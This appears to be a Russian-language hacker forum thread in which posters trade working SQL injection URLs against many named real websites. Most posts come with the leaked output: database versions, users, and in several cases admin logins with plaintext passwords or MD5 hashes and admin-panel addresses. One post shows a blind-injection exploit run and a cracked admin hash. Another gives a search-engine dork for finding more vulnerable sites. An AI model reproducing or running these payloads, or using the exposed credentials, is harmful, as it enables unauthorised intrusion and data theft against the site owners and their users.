http://www.homeservice.md/else.php?type_of=-1+union+select+1,2,version(),4,5,6,7,8,9,0/* Version 5.0.45 User 18436@localhost DB 18436
Техцентр www.nivus.ru http://www.nivus.ru/prices/?model=-3+union+select+1,2,user(),database(),version()/* информационный ресурс о шинах, колесных дисках, их производителях и продавцах http://koleso.topof.ru/news.php?pID=-3058+union+select+1,2,3,4,concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),6,7,8,9,10+from+INFORMATION_SCHEMA.COLUMNS/* http://koleso.topof.ru/news.php?pID=-3058+union+select+1,2,3,4,concat_ws(char(58),admin_name,admin_login,admin_password),6,7,8,9,10+from+admins/* Superadmin:topof:33d51f16ddaf72afb581e2a223c602a1:4f News admin:news:fdec339b918fa60443230ce41283de6b:39 Tyre admin:tyre:eee718e1b60f0c56550c1eaecd924f26:ca Disc admin:disk:18a6699dd4b5e1442dbdd1e9dcea78f9:7e Auto admin:auto:06ea27e74223350ee155a71ca04e726e:07 v.savosin:v.savosin:1ca91037401683b596009b56b9b473ef:7f hadmin:hadmin:9aa2eb5106a1dfacfba636314142ef94:89 http://koleso.topof.ru/admin/login.php
_http://www.sex-shop.ru/kernel.php?section=items%2Fpresentations&action=show&item_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/* 1 место в гугле _http://www.google.com/search?q=%D1%81%D0%B5%D0%BA%D1%81+%D1%88%D0%BE%D0%BF&sourceid=opera&num=0&ie=utf-8&oe=utf-8 Версия 5
On Conference. Организация и проведение конференций. http://www.onconference.ru/conferences/index.html?id=-58+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40/* Аудиторская фирма "Корн-Аудит" http://cornaudit.ru/sitenews.php?link=-245+union+select+1,2,3,user(),database(),version(),7,8/* Компания Zelax является ведущим российским разработчиком и производителем решений для сетей передачи данных. http://www.zelax.ru/events/news_telecom/new?newsid=-1168+union+select+1,2,concat(user(),char(58),database(),char(58),version()),4,5,6,7/*
http://www.advocat-volodarsky.kiev.ua/index.php?id=23+UNION+SELECT+1,2,3+LIMIT+1,1/* [email protected] volodarsky 4.1.22-log //********************************** http://www.htfi.ru/?p=24+UNION+SELECT+1,2,3+LIMIT+1,1/* us2623d@localhost 5.0.45 db2623b
Code: http://www.ritambhara.com/unit.php?typeid=-530/**/union/**/select/**/1,2,version(),4/* есть phpbb, но доступа к таблицам наверное нет
типичны пример взлома dle движка через модуль Files mobila.or.kz натравляем сплоит Code: Идет подбор символов... Меньше 78 Больше 55 Меньше 67 Меньше 62 Меньше 59 Меньше 58 Меньше 57 Символ найден: 9 Больше 78 Больше 101 Меньше 113 Меньше 108 Меньше 105 Меньше 104 Меньше 103 Символ найден: f Меньше 78 Меньше 55 Больше 44 Больше 50 Меньше 53 Меньше 52 Символ найден: 4 Меньше 78 Меньше 55 Больше 44 Больше 50 Меньше 53 Больше 52 Символ найден: 5 Больше 78 Меньше 101 Больше 90 Больше 96 Меньше 99 Больше 98 Символ найден: c Меньше 78 Меньше 55 Больше 44 Меньше 50 Больше 48 Символ найден: 1 Больше 78 Меньше 101 Больше 90 Больше 96 Меньше 99 Меньше 98 Символ найден: b Меньше 78 Больше 55 Меньше 67 Меньше 62 Меньше 59 Меньше 58 Меньше 57 Символ найден: 8 Меньше 78 Меньше 55 Больше 44 Больше 50 Меньше 53 Меньше 52 Символ найден: 4 Меньше 78 Меньше 55 Больше 44 Больше 50 Больше 53 Символ найден: 7 Меньше 78 Больше 55 Меньше 67 Меньше 62 Меньше 59 Меньше 58 Меньше 57 Символ найден: 8 Больше 78 Меньше 101 Больше 90 Больше 96 Меньше 99 Больше 98 Символ найден: c Меньше 78 Меньше 55 Больше 44 Больше 50 Больше 53 Символ найден: 6 Меньше 78 Меньше 55 Больше 44 Больше 50 Больше 53 Символ найден: 6 Меньше 78 Больше 55 Меньше 67 Меньше 62 Меньше 59 Меньше 58 Меньше 57 Символ найден: 9 Меньше 78 Больше 55 Меньше 67 Меньше 62 Меньше 59 Меньше 58 Меньше 57 Символ найден: 9 Меньше 78 Меньше 55 Больше 44 Меньше 50 Меньше 48 Больше 47 Символ найден: 0 Меньше 78 Меньше 55 Больше 44 Больше 50 Больше 53 Символ найден: 7 Меньше 78 Меньше 55 Больше 44 Больше 50 Больше 53 Символ найден: 6 Меньше 78 Меньше 55 Больше 44 Меньше 50 Больше 48 Символ найден: 2 Меньше 78 Меньше 55 Больше 44 Больше 50 Меньше 53 Меньше 52 Символ найден: 3 Меньше 78 Больше 55 Меньше 67 Меньше 62 Меньше 59 Меньше 58 Меньше 57 Символ найден: 8 Меньше 78 Больше 55 Меньше 67 Меньше 62 Меньше 59 Меньше 58 Меньше 57 Символ найден: 8 Меньше 78 Меньше 55 Больше 44 Больше 50 Меньше 53 Меньше 52 Символ найден: 4 Меньше 78 Больше 55 Меньше 67 Меньше 62 Меньше 59 Меньше 58 Меньше 57 Символ найден: 8 Больше 78 Меньше 101 Больше 90 Больше 96 Больше 99 Символ найден: e Меньше 78 Больше 55 Меньше 67 Меньше 62 Меньше 59 Меньше 58 Меньше 57 Символ найден: 9 Меньше 78 Меньше 55 Больше 44 Меньше 50 Меньше 48 Больше 47 Символ найден: 0 Больше 78 Меньше 101 Больше 90 Больше 96 Больше 99 Символ найден: d Больше 78 Меньше 101 Больше 90 Больше 96 Меньше 99 Больше 98 Символ найден: c Больше 78 Больше 101 Меньше 113 Меньше 108 Меньше 105 Меньше 104 Меньше 103 Символ найден: f Больше 78 Больше 101 Меньше 113 Меньше 108 Меньше 105 Меньше 104 Меньше 103 Символ найден: f 9f45c1b8478c6699076238848e90dcff md5(md5('pass')) = 9f45c1b8478c6699076238848e90dcff = 023154 ник админа devil http://mobila.or.kz/admin.php идем админить правда в этом случае шел не удалось залить, но бажных сайтов много дерзайте))
upi.ru - Урал-пресс-информ В антибояне вроде нет, но кажись где-то всё же этот узел светился... Code: http://www.upi.ru/show_image_photoset.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7/* 5.0.32-log:articles:upi@localhost 55 таблиц, остальное через мобилу искать внапряг...
К моему верхнему посту _http://intimshop.ru/kernel.php?section=items%2Fpresentations&action=show&item_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/* Тотже двиг, тоже секс шоп таже 5 версия
Продукт: ----------- Разработчик: www.webroad.ru Баг: Sql Injection Google: site:ru inurl:news.php?id1= Example: Code: http://dipl.spb.ru/news.php?id1=-288+union+select+1,2,3,concat(login,0x3a,password),5,6,7,8,9,10,11,12,13,14+from+ssrusers/* Result: admin:Lampo4ka Админка: http://dipl.spb.ru/admin Comments: Что-то вроде CMS, названия нет, и сайтов под ней штук 20. Баг работает не везде, т.к. при эксплуатации скуль, при слове from в запросе, иногда перебрасывает на http://2.sweb.ru/insecure, а иногда количество полей неверное, придется подбирать самим
http://www.enbek.kz/migration/migr_rus.php?mintrud=-1+union+select+1,2,concat(version(),char(13),user(),char(13),database()),4,5,6,7/* 4.1.7-standard-log root@localhost enbek login:root passiz01EN
http://www.akciyaleitz.eu/products.php?action=products_list&group=-1+union+select+1,version(),3,4/* 5.0.32-Debian_7etch1-log http://www.akciyaleitz.eu/admin/index.php login:akciya pass:aklz07 login:akstat pass:akst81 login:akwin pass:akwn38
если баян не ругаться _http://www.number.ru/links/index.php?cat=-1+union+select+concat_ws(Char(58),user(),database(),VERSION()),2,3,4,5,6,7/* root@localhost:number:4.0.26-log (результат почти в самом низу) http://www.l-gifts.ru/brandopis.php?brand=-1+union+select+1,null,3,null,5,6,concat_ws(CHAR(58),DATABASE(),USER(),VERSION()),8,9,10/* vittorio:[email protected]:4.0.27-log
www.myadultplanet.com имя юзера: myadultp_main@localhost название БД: myadultp_main версия мускула: 4.1.22 угаданные имена таблиц: blogs, messages, groups, events, help, photos, journal, invites, bookmarks phpinfo: P.S. Для реализации баги - нужно зарегиться на сайте.
http://www.ayda.ru/stories/show_u.php?u=-1+union+select+1,2,3,4,5,6,7,concat(login,char(58),password),9,10,11,12,13,14,15+from+users/* login:maxversus pass:Km12hox15 При дальнейшем исследовании оказалось что логин всего один так что скорее всего это админ.
http://www.ebsdublin.com/ Code: http://www.ebsdublin.com/main.php?ID1=1&ID2=0x2d3127%20union+select+1,2,3,4,5,6,7,8,concat_ws(0x2F,version(),database(),user())/* 5.0.45-community-log/EBSDUBL_db/[email protected] http://evangelistrussellkidman.com/ Code: http://evangelistrussellkidman.com/main.php?id1=0x2d3127%20union+select+1,2,concat_ws(0x2F,version(),database(),user()),4/* 4.0.25/evangel_kidman/evangel_manager@localhost http://www.e-self.co.kr/ Code: http://www.e-self.co.kr/[COLOR=Red]shop[/COLOR]/main.php?page=view_class&class_id=0x2d3127%20union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9,10,11,12/* 4.0.26-log/ns_eself/eself@localhost
http://www.dknews.kz/leftlink.php?linkid=1171&archid=-1+union+select+1,concat(version(),char(58),user(),char(58),database()),3,777,5/* 4.1.22-standard dknewsk@localhost dknewsk_manat
Code: http://www.wfsj.org/projects/page.php?id=-62+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),4,5,6,7,8,9,10,11/* user:wfsj@localhost ver:4.1.7-nt-max db:wfsj таблицы подобрать не получилось
http://www.champleague.ru/index.php?cat=rounds&season=1&id=-99999+union+select+1,2,3,concat_ws(0x3a,id,username,password),5,6,7+from+users/* USER(): rufoot_lch@localhost VERSION(): 4.1.22-log DATABASE(): rufoot_lch 1:admin:admin01 где одминка хз ***************************************** http://www.globalwaterfoundation.org/news.php?id=-99999+union+select+1,concat_ws(0x3a,user_id,user_first_name,user_last_name,user_username,user_password),3+from+wma_users/* USER(): [email protected] VERSION(): 5.0.37-community-log DATABASE(): globalwaterfoundation_org_-_1 4:4What:Interactive:4what:4what 5:Global Water:Foundation:gwf:water ***************************************** http://www.kvn.com/attorneys_bio.php?id=-99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* USER(): kvn@localhost VERSION(): 5.0.24-community-nt DATABASE(): kvn
